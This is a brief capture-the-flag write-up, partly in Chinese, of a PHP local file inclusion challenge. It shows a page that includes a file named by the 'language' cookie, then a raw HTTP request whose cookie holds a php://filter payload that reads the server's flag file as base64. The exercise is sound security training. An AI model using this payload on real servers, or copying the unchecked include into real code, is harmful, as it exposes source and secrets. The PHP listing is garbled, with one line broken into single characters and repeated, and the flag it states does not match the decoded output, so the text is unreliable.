
?php
if( !ini_get(‘display_errors’) ) {
ini_set(‘display_errors’, ‘On’);
}
error_reporting(E_ALL);
$lan =
C
O
O
K
I
E
[
′
l
a
n
g
u
a
g
e
′
]
;
i
f
(
!
_COOKIE['language']; if(!
COOKIE[′language′];if(!lan)
{
@setcookie(“language”,“english”);
@include(“english.php”);
}
else
{
@include($lan.“.php”);
}
$x=file_get_contents(‘index.php’);
echo $x;
?


GET / HTTP/1.1
Host: 61.147.171.105:54106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag
PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezczZDI2NmU3OTUyMjMxYTViMjZkZTFlMjg0ODM0Y2IyfSI7DQo/Pg==

找到flag
cyberpeace{f67525b85cbccbdfa4c05607fff7ce34}
参考:https://blog.csdn.net/lyshark_lyshark/article/details/126799168